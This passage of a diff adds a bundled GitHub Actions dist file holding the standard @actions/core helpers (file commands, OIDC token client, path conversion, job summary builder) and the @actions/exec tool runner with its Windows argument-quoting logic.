__importStar(__nccwpck_require__(2037)); +const uuid_1 = __nccwpck_require__(5840); +const utils_1 = __nccwpck_require__(5278); +function issueFileCommand(command, message) { + const filePath = process.env[`GITHUB_${command}`]; + if (!filePath) { + throw new Error(`Unable to find environment variable for file command ${command}`); + } + if (!fs.existsSync(filePath)) { + throw new Error(`Missing file at path: ${filePath}`); + } + fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { + encoding: 'utf8' + }); +} +exports.issueFileCommand = issueFileCommand; +function prepareKeyValueMessage(key, value) { + const delimiter = `ghadelimiter_${uuid_1.v4()}`; + const convertedValue = utils_1.toCommandValue(value); + // These should realistically never happen, but just in case someone finds a + // way to exploit uuid generation let's not allow keys or values that contain + // the delimiter. + if (key.includes(delimiter)) { + throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); + } + if (convertedValue.includes(delimiter)) { + throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); + } + return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; +} +exports.prepareKeyValueMessage = prepareKeyValueMessage; +//# sourceMappingURL=file-command.js.map + +/***/ }), + +/***/ 8041: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.OidcClient = void 0; +const http_client_1 = __nccwpck_require__(6255); +const auth_1 = __nccwpck_require__(5526); +const core_1 = __nccwpck_require__(2186); +class OidcClient { + static createHttpClient(allowRetry = true, maxRetry = 10) { + const requestOptions = { + allowRetries: allowRetry, + maxRetries: maxRetry + }; + return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); + } + static getRequestToken() { + const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; + if (!token) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); + } + return token; + } + static getIDTokenUrl() { + const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; + if (!runtimeUrl) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); + } + return runtimeUrl; + } + static getCall(id_token_url) { + var _a; + return __awaiter(this, void 0, void 0, function* () { + const httpclient = OidcClient.createHttpClient(); + const res = yield httpclient + .getJson(id_token_url) + .catch(error => { + throw new Error(`Failed to get ID Token. \n + Error Code : ${error.statusCode}\n + Error Message: ${error.message}`); + }); + const id_token = (_a = res.result) === null || _a === void 0 ? void 0 : _a.value; + if (!id_token) { + throw new Error('Response json body do not have ID Token field'); + } + return id_token; + }); + } + static getIDToken(audience) { + return __awaiter(this, void 0, void 0, function* () { + try { + // New ID Token is requested from action service + let id_token_url = OidcClient.getIDTokenUrl(); + if (audience) { + const encodedAudience = encodeURIComponent(audience); + id_token_url = `${id_token_url}&audience=${encodedAudience}`; + } + core_1.debug(`ID token url is ${id_token_url}`); + const id_token = yield OidcClient.getCall(id_token_url); + core_1.setSecret(id_token); + return id_token; + } + catch (error) { + throw new Error(`Error message: ${error.message}`); + } + }); + } +} +exports.OidcClient = OidcClient; +//# sourceMappingURL=oidc-utils.js.map + +/***/ }), + +/***/ 2981: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; +const path = __importStar(__nccwpck_require__(1017)); +/** + * toPosixPath converts the given path to the posix form. On Windows, \\ will be + * replaced with /. + * + * @param pth. Path to transform. + * @return string Posix path. + */ +function toPosixPath(pth) { + return pth.replace(/[\\]/g, '/'); +} +exports.toPosixPath = toPosixPath; +/** + * toWin32Path converts the given path to the win32 form. On Linux, / will be + * replaced with \\. + * + * @param pth. Path to transform. + * @return string Win32 path. + */ +function toWin32Path(pth) { + return pth.replace(/[/]/g, '\\'); +} +exports.toWin32Path = toWin32Path; +/** + * toPlatformPath converts the given path to a platform-specific path. It does + * this by replacing instances of / and \ with the platform-specific path + * separator. + * + * @param pth The path to platformize. + * @return string The platform-specific path. + */ +function toPlatformPath(pth) { + return pth.replace(/[/\\]/g, path.sep); +} +exports.toPlatformPath = toPlatformPath; +//# sourceMappingURL=path-utils.js.map + +/***/ }), + +/***/ 1327: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; +const os_1 = __nccwpck_require__(2037); +const fs_1 = __nccwpck_require__(7147); +const { access, appendFile, writeFile } = fs_1.promises; +exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; +exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; +class Summary { + constructor() { + this._buffer = ''; + } + /** + * Finds the summary file path from the environment, rejects if env var is not found or file does not exist + * Also checks r/w permissions. + * + * @returns step summary file path + */ + filePath() { + return __awaiter(this, void 0, void 0, function* () { + if (this._filePath) { + return this._filePath; + } + const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; + if (!pathFromEnv) { + throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); + } + try { + yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); + } + catch (_a) { + throw new Error(`Unable to access summary file: '${pathFromEnv}'. Check if the file has correct read/write permissions.`); + } + this._filePath = pathFromEnv; + return this._filePath; + }); + } + /** + * Wraps content in an HTML tag, adding any HTML attributes + * + * @param {string} tag HTML tag to wrap + * @param {string | null} content content within the tag + * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add + * + * @returns {string} content wrapped in HTML element + */ + wrap(tag, content, attrs = {}) { + const htmlAttrs = Object.entries(attrs) + .map(([key, value]) => ` ${key}="${value}"`) + .join(''); + if (!content) { + return `<${tag}${htmlAttrs}>`; + } + return `<${tag}${htmlAttrs}>${content}`; + } + /** + * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. + * + * @param {SummaryWriteOptions} [options] (optional) options for write operation + * + * @returns {Promise} summary instance + */ + write(options) { + return __awaiter(this, void 0, void 0, function* () { + const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); + const filePath = yield this.filePath(); + const writeFunc = overwrite ? writeFile : appendFile; + yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); + return this.emptyBuffer(); + }); + } + /** + * Clears the summary buffer and wipes the summary file + * + * @returns {Summary} summary instance + */ + clear() { + return __awaiter(this, void 0, void 0, function* () { + return this.emptyBuffer().write({ overwrite: true }); + }); + } + /** + * Returns the current summary buffer as a string + * + * @returns {string} string of summary buffer + */ + stringify() { + return this._buffer; + } + /** + * If the summary buffer is empty + * + * @returns {boolen} true if the buffer is empty + */ + isEmptyBuffer() { + return this._buffer.length === 0; + } + /** + * Resets the summary buffer without writing to summary file + * + * @returns {Summary} summary instance + */ + emptyBuffer() { + this._buffer = ''; + return this; + } + /** + * Adds raw text to the summary buffer + * + * @param {string} text content to add + * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) + * + * @returns {Summary} summary instance + */ + addRaw(text, addEOL = false) { + this._buffer += text; + return addEOL ? this.addEOL() : this; + } + /** + * Adds the operating system-specific end-of-line marker to the buffer + * + * @returns {Summary} summary instance + */ + addEOL() { + return this.addRaw(os_1.EOL); + } + /** + * Adds an HTML codeblock to the summary buffer + * + * @param {string} code content to render within fenced code block + * @param {string} lang (optional) language to syntax highlight code + * + * @returns {Summary} summary instance + */ + addCodeBlock(code, lang) { + const attrs = Object.assign({}, (lang && { lang })); + const element = this.wrap('pre', this.wrap('code', code), attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML list to the summary buffer + * + * @param {string[]} items list of items to render + * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) + * + * @returns {Summary} summary instance + */ + addList(items, ordered = false) { + const tag = ordered ? 'ol' : 'ul'; + const listItems = items.map(item => this.wrap('li', item)).join(''); + const element = this.wrap(tag, listItems); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML table to the summary buffer + * + * @param {SummaryTableCell[]} rows table rows + * + * @returns {Summary} summary instance + */ + addTable(rows) { + const tableBody = rows + .map(row => { + const cells = row + .map(cell => { + if (typeof cell === 'string') { + return this.wrap('td', cell); + } + const { header, data, colspan, rowspan } = cell; + const tag = header ? 'th' : 'td'; + const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); + return this.wrap(tag, data, attrs); + }) + .join(''); + return this.wrap('tr', cells); + }) + .join(''); + const element = this.wrap('table', tableBody); + return this.addRaw(element).addEOL(); + } + /** + * Adds a collapsable HTML details element to the summary buffer + * + * @param {string} label text for the closed state + * @param {string} content collapsable content + * + * @returns {Summary} summary instance + */ + addDetails(label, content) { + const element = this.wrap('details', this.wrap('summary', label) + content); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML image tag to the summary buffer + * + * @param {string} src path to the image you to embed + * @param {string} alt text description of the image + * @param {SummaryImageOptions} options (optional) addition image attributes + * + * @returns {Summary} summary instance + */ + addImage(src, alt, options) { + const { width, height } = options || {}; + const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); + const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML section heading element + * + * @param {string} text heading text + * @param {number | string} [level=1] (optional) the heading level, default: 1 + * + * @returns {Summary} summary instance + */ + addHeading(text, level) { + const tag = `h${level}`; + const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) + ? tag + : 'h1'; + const element = this.wrap(allowedTag, text); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML thematic break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addSeparator() { + const element = this.wrap('hr', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML line break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addBreak() { + const element = this.wrap('br', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML blockquote to the summary buffer + * + * @param {string} text quote text + * @param {string} cite (optional) citation url + * + * @returns {Summary} summary instance + */ + addQuote(text, cite) { + const attrs = Object.assign({}, (cite && { cite })); + const element = this.wrap('blockquote', text, attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML anchor tag to the summary buffer + * + * @param {string} text link text/content + * @param {string} href hyperlink + * + * @returns {Summary} summary instance + */ + addLink(text, href) { + const element = this.wrap('a', text, { href }); + return this.addRaw(element).addEOL(); + } +} +const _summary = new Summary(); +/** + * @deprecated use `core.summary` + */ +exports.markdownSummary = _summary; +exports.summary = _summary; +//# sourceMappingURL=summary.js.map + +/***/ }), + +/***/ 5278: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toCommandProperties = exports.toCommandValue = void 0; +/** + * Sanitizes an input into a string so it can be passed into issueCommand safely + * @param input input to sanitize into a string + */ +function toCommandValue(input) { + if (input === null || input === undefined) { + return ''; + } + else if (typeof input === 'string' || input instanceof String) { + return input; + } + return JSON.stringify(input); +} +exports.toCommandValue = toCommandValue; +/** + * + * @param annotationProperties + * @returns The command properties to send with the actual annotation command + * See IssueCommandProperties: https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 + */ +function toCommandProperties(annotationProperties) { + if (!Object.keys(annotationProperties).length) { + return {}; + } + return { + title: annotationProperties.title, + file: annotationProperties.file, + line: annotationProperties.startLine, + endLine: annotationProperties.endLine, + col: annotationProperties.startColumn, + endColumn: annotationProperties.endColumn + }; +} +exports.toCommandProperties = toCommandProperties; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 1514: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getExecOutput = exports.exec = void 0; +const string_decoder_1 = __nccwpck_require__(1576); +const tr = __importStar(__nccwpck_require__(8159)); +/** + * Exec a command. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. + * @param options optional exec options. See ExecOptions + * @returns Promise exit code + */ +function exec(commandLine, args, options) { + return __awaiter(this, void 0, void 0, function* () { + const commandArgs = tr.argStringToArray(commandLine); + if (commandArgs.length === 0) { + throw new Error(`Parameter 'commandLine' cannot be null or empty.`); + } + // Path to tool to execute should be first arg + const toolPath = commandArgs[0]; + args = commandArgs.slice(1).concat(args || []); + const runner = new tr.ToolRunner(toolPath, args, options); + return runner.exec(); + }); +} +exports.exec = exec; +/** + * Exec a command and get the output. + * Output will be streamed to the live console. + * Returns promise with the exit code and collected stdout and stderr + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. + * @param options optional exec options. See ExecOptions + * @returns Promise exit code, stdout, and stderr + */ +function getExecOutput(commandLine, args, options) { + var _a, _b; + return __awaiter(this, void 0, void 0, function* () { + let stdout = ''; + let stderr = ''; + //Using string decoder covers the case where a mult-byte character is split + const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); + const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); + const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; + const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; + const stdErrListener = (data) => { + stderr += stderrDecoder.write(data); + if (originalStdErrListener) { + originalStdErrListener(data); + } + }; + const stdOutListener = (data) => { + stdout += stdoutDecoder.write(data); + if (originalStdoutListener) { + originalStdoutListener(data); + } + }; + const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); + const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); + //flush any remaining characters + stdout += stdoutDecoder.end(); + stderr += stderrDecoder.end(); + return { + exitCode, + stdout, + stderr + }; + }); +} +exports.getExecOutput = getExecOutput; +//# sourceMappingURL=exec.js.map + +/***/ }), + +/***/ 8159: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.argStringToArray = exports.ToolRunner = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const events = __importStar(__nccwpck_require__(2361)); +const child = __importStar(__nccwpck_require__(2081)); +const path = __importStar(__nccwpck_require__(1017)); +const io = __importStar(__nccwpck_require__(7436)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +const timers_1 = __nccwpck_require__(9512); +/* eslint-disable @typescript-eslint/unbound-method */ +const IS_WINDOWS = process.platform === 'win32'; +/* + * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. + */ +class ToolRunner extends events.EventEmitter { + constructor(toolPath, args, options) { + super(); + if (!toolPath) { + throw new Error("Parameter 'toolPath' cannot be null or empty."); + } + this.toolPath = toolPath; + this.args = args || []; + this.options = options || {}; + } + _debug(message) { + if (this.options.listeners && this.options.listeners.debug) { + this.options.listeners.debug(message); + } + } + _getCommandString(options, noPrefix) { + const toolPath = this._getSpawnFileName(); + const args = this._getSpawnArgs(options); + let cmd = noPrefix ? '' : '[command]'; // omit prefix when piped to a second tool + if (IS_WINDOWS) { + // Windows + cmd file + if (this._isCmdFile()) { + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows + verbatim + else if (options.windowsVerbatimArguments) { + cmd += `"${toolPath}"`; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows (regular) + else { + cmd += this._windowsQuoteCmdArg(toolPath); + for (const a of args) { + cmd += ` ${this._windowsQuoteCmdArg(a)}`; + } + } + } + else { + // OSX/Linux - this can likely be improved with some form of quoting. + // creating processes on Unix is fundamentally different than Windows. + // on Unix, execvp() takes an arg array. + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + return cmd; + } + _processLineBuffer(data, strBuffer, onLine) { + try { + let s = strBuffer + data.toString(); + let n = s.indexOf(os.EOL); + while (n > -1) { + const line = s.substring(0, n); + onLine(line); + // the rest of the string ... + s = s.substring(n + os.EOL.length); + n = s.indexOf(os.EOL); + } + return s; + } + catch (err) { + // streaming lines to console is best effort. Don't fail a build. + this._debug(`error processing line. Failed with error ${err}`); + return ''; + } + } + _getSpawnFileName() { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + return process.env['COMSPEC'] || 'cmd.exe'; + } + } + return this.toolPath; + } + _getSpawnArgs(options) { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; + for (const a of this.args) { + argline += ' '; + argline += options.windowsVerbatimArguments + ? a + : this._windowsQuoteCmdArg(a); + } + argline += '"'; + return [argline]; + } + } + return this.args; + } + _endsWith(str, end) { + return str.endsWith(end); + } + _isCmdFile() { + const upperToolPath = this.toolPath.toUpperCase(); + return (this._endsWith(upperToolPath, '.CMD') || + this._endsWith(upperToolPath, '.BAT')); + } + _windowsQuoteCmdArg(arg) { + // for .exe, apply the normal quoting rules that libuv applies + if (!this._isCmdFile()) { + return this._uvQuoteCmdArg(arg); + } + // otherwise apply quoting rules specific to the cmd.exe command line parser. + // the libuv rules are generic and are not designed specifically for cmd.exe + // command line parser. + // + // for a detailed description of the cmd.exe command line parser, refer to + // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 + // need quotes for empty arg + if (!arg) { + return '""'; + } + // determine whether the arg needs to be quoted + const cmdSpecialChars = [ + ' ', + '\t', + '&', + '(', + ')', + '[', + ']', + '{', + '}', + '^', + '=', + ';', + '!', + "'", + '+', + ',', + '`', + '~', + '|', + '<', + '>', + '"' + ]; + let needsQuotes = false; + for (const char of arg) { + if (cmdSpecialChars.some(x => x === char)) { + needsQuotes = true; + break; + } + } + // short-circuit if quotes not needed + if (!needsQuotes) { + return arg; + } + // the following quoting rules are very similar to the rules that by libuv applies. + // + // 1) wrap the string in quotes + // + // 2) double-up quotes - i.e. " => "" + // + // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately + // doesn't work well with a cmd.exe command line. + // + // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. + // for example, the command line: + // foo.exe "myarg:""my val""" + // is parsed by a .NET console app into an arg array: + // [ "myarg:\"my val\"" ] + // which is the same end result when applying libuv quoting rules. although the actual + // command line from libuv quoting rules would look like: + // foo.exe "myarg:\"my val\"" + // + // 3) double-up slashes that precede a quote, + // e.g. hello \world => "hello \world" + // hello\"world => "hello\\""world" + // hello\\"world => "hello\\\\""world" + // hello world\ => "hello world\\" + // + // technically this is not required for a cmd.exe command line, or the batch argument parser. + // the reasons for including this as a .cmd quoting rule are: + // + // a) this is optimized for the scenario where the argument is passed from the .cmd file to an + // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. + // + // b) it's what we've been doing previously (by deferring to node default behavior) and we + // haven't heard any complaints about that aspect. + // + // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be + // escaped when used on the command line directly - even though within a .cmd file % can be escaped + // by using %%. + // + // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts + // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. + // + // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would + // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the + // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args + // to an external program. + // + // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. + // % can be escaped within a .cmd file. + let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; // double the slash + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '"'; // double the quote + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _uvQuoteCmdArg(arg) { + // Tool runner wraps child_process.spawn() and needs to apply the same quoting as + // Node in certain cases where the undocumented spawn option windowsVerbatimArguments + // is used. + // + // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, + // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), + // pasting copyright notice from Node within this function: + // + // Copyright Joyent, Inc. and other Node contributors. All rights reserved. + // + // Permission is hereby granted, free of charge, to any person obtaining a copy + // of this software and associated documentation files (the "Software"), to + // deal in the Software without restriction, including without limitation the + // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + // sell copies of the Software, and to permit persons to whom the Software is + // furnished to do so, subject to the following conditions: + // + // The above copyright notice and this permission notice shall be included in + // all copies or substantial portions of the Software. + // + // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + // IN THE SOFTWARE. + if (!arg) { + // Need double quotation for empty argument + return '""'; + } + if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { + // No quotation needed + return arg; + } + if (!arg.includes('"') && !arg.includes('\\')) { + // No embedded double quotes or backslashes, so I can just wrap + // quote marks around the whole thing. + return `"${arg}"`; + } + // Expected input/output: + // input : hello"world + // output: "hello\"world" + // input : hello""world + // output: "hello\"\"world" + // input : hello\world + // output: hello\world + // input : hello\\world + // output: hello\\world + // input : hello\"world + // output: "hello\\\"world" + // input : hello\\"world + // output: "hello\\\\\"world" + // input : hello world\ + // output: "hello world\\" - note the comment in libuv actually reads "hello world\" + // but it appears the comment is wrong, it should be "hello world\\" + let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '\\'; + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _cloneExecOptions(options) { + options = options || {}; + const result = { + cwd: options.cwd || process.cwd(), + env: options.env || process.env, + silent: options.silent || false, + windowsVerbatimArguments: options.windowsVerbatimArguments || false, + failOnStdErr: options.failOnStdErr || false, + ignoreReturnCode: options.ignoreReturnCode || false, + delay: options.delay || 10000 + }; + result.outStream = options.outStream || process.stdout; + result.errStream = options.errStream || process.stderr; + return result; + } + _getSpawnOptions(options, toolPath) { + options = options || {}; + const result = {}; + result.cwd = options.cwd; + result.env = options.env; + result['windowsVerbatimArguments'] = + options.windowsVerbatimArguments || this._isCmdFile(); + if (options.windowsVerbatimArguments) { + result.argv0 = `"${toolPath}"`; + } + return result; + } + /** + * Exec a tool. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param tool path to tool to exec + * @param options optional exec options. See ExecOptions + * @returns number + */ + exec() { + return __awaiter(this, void 0, void 0, function* () { + // root the tool path if it is unrooted and contains relative pathing + if (!ioUtil.isRooted(this.toolPath) && + (this.toolPath.includes('/') || + (IS_WINDOWS && this.toolPath.includes('\\')))) { + // prefer options.cwd if it is specified, however options.cwd may also need to be rooted + this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); + } + // if the tool is only a file name, then resolve it from the PATH + // otherwise verify it exists (add extension on Windows if necessary) + this.toolPath = yield io.which(this.toolPath, true); + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + this._debug(`exec tool: ${this.toolPath}`); + this._debug('arguments:'); + for (const arg of this.args) { + this._debug(` ${arg}`); + } + const optionsNonNull = this._cloneExecOptions(this.options); + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); + } + const state = new ExecState(optionsNonNull, this.toolPath); + state.on('debug', (message) => { + this._debug(message); + }); + if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { + return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); + } + const fileName = this._getSpawnFileName(); + const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); + let stdbuffer = ''; + if (cp.stdout) { + cp.stdout.on('data', (data) => { + if (this.options.listeners && this.options.listeners.stdout) { + this.options.listeners.stdout(data); + } + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(data); + } + stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { + if (this.options.listeners && this.options.listeners.stdline) { + this.options.listeners.stdline(line); + } + }); + }); + } + let errbuffer = ''; + if (cp.stderr) { + cp.stderr.on('data', (data) => { + state.processStderr = true; + if (this.options.listeners && this.options.listeners.stderr) { + this.options.listeners.stderr(data); + } + if 